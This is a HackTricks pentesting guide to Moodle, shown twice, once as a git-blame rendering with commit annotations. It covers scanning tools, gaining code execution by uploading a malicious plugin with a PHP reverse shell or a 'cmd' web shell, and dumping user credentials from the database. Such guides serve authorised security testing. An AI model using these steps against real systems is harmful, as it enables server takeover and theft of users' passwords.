hacktricks/network-services-pentesting/pentesting-web/moodle.md

# Moodle

<details>

<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">

If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).

{% embed url="https://www.stmcyber.com/careers" %}

## Automatic Scans

### droopescan

```bash
pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/

[+] Plugins found:                                                              
    forum http://moodle.schooled.htb/moodle/mod/forum/
        http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
        http://moodle.schooled.htb/moodle/mod/forum/version.php

[+] No themes found.

[+] Possible version(s):
    3.10.0-beta

[+] Possible interesting urls found:
    Static readme file. - http://moodle.schooled.htb/moodle/README.txt
    Admin panel - http://moodle.schooled.htb/moodle/login/

[+] Scan finished (0:00:05.643539 elapsed)
```

### moodlescan

```bash
#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/

Version 0.7 - Dic/2020
.............................................................................................................

By Victor Herrera - supported by www.incode.cl
	
.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle/ ...

server         	: Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by   	: PHP/7.4.15
x-frame-options	: sameorigin
last-modified  	: Wed, 07 Apr 2021 21:33:41 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.
```

### CMSMap

```bash
pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>
```

### CVEs

I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)

## **RCE**

You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab\*\*:\*\*

![](<../../.gitbook/assets/image (447).png>)

If you are manager you may still need to **activate this option**. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).

Then, you can **install the following plugin** that contains the classic pentest-monkey php r**ev shell** (_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_)

{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}

Or you could use the plugin from [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) to get a regular PHP shell with the "cmd" parameter.

To access launch the malicious plugin you need to access to:

```bash
http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
```

## POST

### Find database credentials

```bash
find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
```

### Dump Credentials from database

```bash
/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
```

<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">

If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`# Moodle`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

hacktricks twitch 2022-12-05 22:29:21 +00:00			`<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3613] No subject 2022-10-22 14:44:59 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
hacktricks twitch 2022-12-05 22:29:21 +00:00			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

GitBook: [#3614] No subject 2022-10-22 15:01:16 +00:00			`<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">`
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00
			`If you are interested in hacking carer and hack the unhackable - we are hiring! (_fluent polish written and spoken required_).`

			`{% embed url="https://www.stmcyber.com/careers" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`## Automatic Scans`
GitBook: [master] 2 pages modified 2021-04-05 22:03:17 +00:00
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`### droopescan`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
			```bash
			`pip3 install droopescan`
			`droopescan scan moodle -u http://moodle.example.com/<moodle_path>/`

			`[+] Plugins found:`
			`forum http://moodle.schooled.htb/moodle/mod/forum/`
			`http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt`
			`http://moodle.schooled.htb/moodle/mod/forum/version.php`

			`[+] No themes found.`

			`[+] Possible version(s):`
			`3.10.0-beta`

			`[+] Possible interesting urls found:`
			`Static readme file. - http://moodle.schooled.htb/moodle/README.txt`
			`Admin panel - http://moodle.schooled.htb/moodle/login/`

			`[+] Scan finished (0:00:05.643539 elapsed)`
			```

GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`### moodlescan`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
			```bash
			`#Install from https://github.com/inc0d3/moodlescan`
			`python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/`

			`Version 0.7 - Dic/2020`
			`.............................................................................................................`

			`By Victor Herrera - supported by www.incode.cl`

			`.............................................................................................................`

			`Getting server information http://moodle.schooled.htb/moodle/ ...`

			`server : Apache/2.4.46 (FreeBSD) PHP/7.4.15`
			`x-powered-by : PHP/7.4.15`
			`x-frame-options : sameorigin`
			`last-modified : Wed, 07 Apr 2021 21:33:41 GMT`

			`Getting moodle version...`

			`Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta`

			`Searching vulnerabilities...`


			`Vulnerabilities found: 0`

			`Scan completed.`
			```

GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`### CMSMap`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
			```bash
cmsmap is not on pypi, so you can install it from github 2022-10-27 15:22:10 +00:00			`pip3 install git+https://github.com/dionach/CMSmap.git`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00			`cmsmap http://moodle.example.com/<moodle_path>`
			```

GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`### CVEs`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
fix bad chars 2022-04-05 22:24:52 +00:00			`I found that the automatic tools are pretty useless finding vulnerabilities affecting the moodle version. You can check for them in [https://snyk.io/vuln/composer:moodle%2Fmoodle](https://snyk.io/vuln/composer:moodle%2Fmoodle)`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`## RCE`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`You need to have manager role and you can install plugins inside the "Site administration" tab\\:\\`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`![](<../../.gitbook/assets/image (447).png>)`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
			`If you are manager you may still need to activate this option. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`Then, you can install the following plugin that contains the classic pentest-monkey php rev shell (_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_)`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
			`{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`Or you could use the plugin from [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) to get a regular PHP shell with the "cmd" parameter.`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
			`To access launch the malicious plugin you need to access to:`

			```bash
			`http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id`
			```

GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`## POST`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`### Find database credentials`
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
			```bash
			`find / -name "config.php" 2>/dev/null \| grep "moodle/config.php"`
			```

GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`### Dump Credentials from database`
GitBook: [master] 2 pages modified 2021-04-05 22:03:17 +00:00
			```bash
			`/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"`
			```

GitBook: [#3614] No subject 2022-10-22 15:01:16 +00:00			`<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00			`If you are interested in hacking carer and hack the unhackable - we are hiring! (_fluent polish written and spoken required_).`

			`{% embed url="https://www.stmcyber.com/careers" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

hacktricks twitch 2022-12-05 22:29:21 +00:00			`<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3613] No subject 2022-10-22 14:44:59 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
hacktricks twitch 2022-12-05 22:29:21 +00:00			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`